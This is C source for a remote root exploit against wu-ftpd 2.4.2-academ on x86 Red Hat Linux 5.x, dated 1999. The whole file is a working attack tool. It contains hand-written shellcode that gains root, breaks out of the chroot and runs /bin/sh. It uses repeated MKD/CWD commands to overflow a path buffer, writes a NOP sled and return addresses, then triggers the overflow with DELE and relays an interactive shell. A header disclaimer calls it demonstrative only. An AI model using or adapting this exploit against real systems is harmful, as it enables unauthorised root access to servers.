/*

	Wu-ftpd exploit code for x86 linux

	Remote user can gain root access.

	Tested redhat linux : 5.0 , 5.1 , 5.2
	Tested wu-ftpd version : wu-2.4.2-academ[BETA-15](1)
	                         wu-2.4.2-academ[BETA-17](1)
	                         wu-2.4.2-academ[BETA-18](1)

	This program is only for demonstrative use only.
	USE IT AT YOUR OWN RISK!

	Programmed by Taeho Oh 1999/05/11

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<string.h>
#include<netdb.h>
#include<netinet/in.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<sys/time.h>
#include<unistd.h>

#define RET 0xbfffa92d
#define NOP 0x90

void logintoftp(int sockfd,char *userid,char *passwd);
void sh(int sockfd);
void mkd(int sockfd,char *dir);
void cwd(int sockfd,char *dir);
void dele(int sockfd,char *dir);
long getip(char *name);
void mkpdir(int i,char *pdir);

char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x4f"                      /* jmp 0x4f              */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\x5e"                          /* popl %esi             */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xfe\xc5"                      /* incb %ch              */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	"\xf7\xdb"                      /* negl %ebx             */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	"\x56"                          /* pushl %esi            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl %0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	"\x5e"                          /* popl %esi             */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xac\xff\xff\xff";         /* call -0x54            */

int main(int argc,char **argv)
{
	int sockfd;
	char sendln[1024],recvln[4048];
	int len,offset=0,i;
	int pos;
	char pdir[256];
	char buff[256],*ptr;
	long *addr_ptr,addr;
	char userid[128],passwd[128];
	struct sockaddr_in cli;

	printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

	if(argc<5){
		printf("\nusage: %s host userid password dir [offset]\n\n", argv[0]);
		printf("\n", argv[0]);
		exit(0);
	}

	strcpy(userid,argv[2]);
	strcpy(passwd,argv[3]);
	if(argc>5)
		offset=atoi(argv[5]);

	bzero(&cli,sizeof(cli));
	bzero(recvln,sizeof(recvln));
	bzero(sendln,sizeof(sendln));
	cli.sin_family=AF_INET;
	cli.sin_port=htons(21);
	cli.sin_addr.s_addr=getip(argv[1]);
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
		exit(0);
	if(connect(sockfd,(struct sockaddr *)&cli,sizeof(cli))<0)
		exit(0);
	while((len=read(sockfd,recvln,sizeof(recvln)))>0)
	{
		recvln[len]='\0';
		if(strchr(recvln,'\n')!=NULL)
			break;
	}

	logintoftp(sockfd,userid,passwd);

	pos=strlen(argv[4]);
	cwd(sockfd,argv[4]);

	while(pos<504)
	{
		mkpdir(255,pdir);
		mkd(sockfd,pdir);
		cwd(sockfd,pdir);
		pos+=256;
	}

	mkpdir(759-pos,pdir);
	mkd(sockfd,pdir);
	cwd(sockfd,pdir);

	for(i=0;i<255;i++)
		buff[i]=NOP;
	buff[i]='\0';

	ptr=buff+255-strlen(shellcode);
	for(i=0;i<strlen(shellcode);i++)
		*(ptr++)=shellcode[i];
	
	mkd(sockfd,buff);
	cwd(sockfd,buff);

	mkd(sockfd,"bin");
	cwd(sockfd,"bin");

	mkd(sockfd,"sh");
	cwd(sockfd,"sh");

	addr=RET-offset;

	ptr=buff;
	addr_ptr=(long*)ptr;
	for(i=0;i<256;i+=4)
		*(addr_ptr++)=addr;
	
	buff[255]='\0';

	mkd(sockfd,buff);
	dele(sockfd,buff);

	sh(sockfd);

	close(sockfd);
}

void mkd(int sockfd,char *dir)
{
	char snd[512],rcv[1024];
	char blah[1024],*p;
	int n;
	struct timeval tv;

	fd_set fds;
	bzero(&tv,sizeof(tv));
	tv.tv_usec=50;
	bzero(blah,sizeof(blah));
	p=blah;
	for(n=0;n<strlen(dir);n++)
	{
		if(dir[n]=='\xff')
		{
			*p='\xff';
			p++;
		}
		*p=dir[n];
		p++;
	}
	sprintf(snd,"MKD %s\r\n",blah);
	write(sockfd,snd,strlen(snd));
	bzero(snd,sizeof(snd));
	bzero(rcv,sizeof(rcv));

	FD_ZERO(&fds);
	FD_SET(sockfd,&fds);
	select(sockfd+1,&fds,NULL,NULL,&tv);

	if(FD_ISSET(sockfd,&fds))
		while((n=read(sockfd,rcv,sizeof(rcv)))>0)
		{
			rcv[n]=0;
			if(strchr(rcv,'\n')!=NULL)
				break;
		}
	return;
}

void cwd(int sockfd,char *dir)
{
	char snd[512],rcv[1024];
	char blah[1024],*p;
	int n;
	struct timeval tv;

	fd_set fds;
	bzero(&tv,sizeof(tv));
	tv.tv_usec=50;
	bzero(blah,sizeof(blah));
	p=blah;
	for(n=0;n<strlen(dir);n++)
	{
		if(dir[n]=='\xff')
		{
			*p='\xff';
			p++;
		}
		*p=dir[n];
		p++;
	}
	sprintf(snd,"CWD %s\r\n",blah);
	write(sockfd,snd,strlen(snd));
	bzero(snd,sizeof(snd));
	bzero(rcv,sizeof(rcv));

	FD_ZERO(&fds);
	FD_SET(sockfd,&fds);
	select(sockfd+1,&fds,NULL,NULL,&tv);

	if(FD_ISSET(sockfd,&fds))
		while((n=read(sockfd,rcv,sizeof(rcv)))>0)
		{
			rcv[n]=0;
			if(strchr(rcv,'\n')!=NULL)
				break;
		}
	return;
}

void dele(int sockfd,char *dir)
{
	char snd[512],rcv[1024];
	char blah[1024],*p;
	int n;
	struct timeval tv;

	fd_set fds;
	bzero(&tv,sizeof(tv));
	tv.tv_usec=50;
	bzero(blah,sizeof(blah));
	p=blah;
	for(n=0;n<strlen(dir);n++)
	{
		if(dir[n]=='\xff')
		{
			*p ='\xff';
			p++;
		}
		*p=dir[n];
		p++;
	}
	sprintf(snd,"DELE %s\r\n",blah);
	write(sockfd,snd,strlen(snd));
	bzero(snd,sizeof(snd));
	bzero(rcv,sizeof(rcv));

	FD_ZERO(&fds);
	FD_SET(sockfd,&fds);
	select(sockfd+1,&fds,NULL,NULL,&tv);

	if(FD_ISSET(sockfd,&fds))
		while((n = read(sockfd,rcv,sizeof(rcv)))>0)
		{
			rcv[n]=0;
			if(strchr(rcv,'\n')!=NULL)
				break;
		}
	return;
}

void logintoftp(int sockfd,char *userid,char *passwd)
{
	char snd[1024],rcv[1024];
	int n;

	memset(snd,'\0',1024);
	sprintf(snd,"USER %s\r\n",userid);
	write(sockfd,snd,strlen(snd));

	while((n=read(sockfd,rcv,sizeof(rcv)))>0)
	{
		rcv[n]=0;
		if(strchr(rcv,'\n')!=NULL)
			break;
	}

	memset(snd,'\0',1024);
	sprintf(snd,"PASS %s\r\n",passwd);
	write(sockfd,snd,strlen(snd));

	while((n=read(sockfd,rcv,sizeof(rcv)))>0)
	{
		rcv[n]=0;
		if(strchr(rcv,'\n')!=NULL)
			break;
	}
	return;
}

void sh(int sockfd)
{
	char snd[1024],rcv[1024];
	fd_set rset;
	int maxfd,n;

	while(1)
	{
		FD_SET(fileno(stdin),&rset);
		FD_SET(sockfd,&rset);
		if(fileno(stdin)>sockfd)
			maxfd=fileno(stdin)+1;
		else
			maxfd=sockfd+1;
		select(maxfd,&rset,NULL,NULL,NULL);
		if(FD_ISSET(fileno(stdin),&rset))
		{
			bzero(snd,sizeof(snd));
			fgets(snd,sizeof(snd)-2,stdin);
			write(sockfd,snd,strlen(snd));
		}
		if(FD_ISSET(sockfd, &rset))
		{
			bzero(rcv, sizeof(rcv));
			if((n=read(sockfd,rcv,sizeof(rcv)))==0)
				exit(0);
			if(n<0)
				exit(-1);
			fputs(rcv,stdout);
		}
	}
}

long getip(char *name)
{
	struct hostent *hp;
	long ip;

	if((ip=inet_addr(name))==-1)
	{
		if ((hp=gethostbyname(name))==NULL)
		{
			fprintf(stderr,"Can't resolve host.\n");
			exit (1);
		}
		memcpy(&ip,(hp->h_addr),4);
	}
	return ip;
}

void mkpdir(int size,char *pdir)
{
	int i;
	for(i=0;i<size;i++)
		pdir[i]='A';
	pdir[i]='\0';
}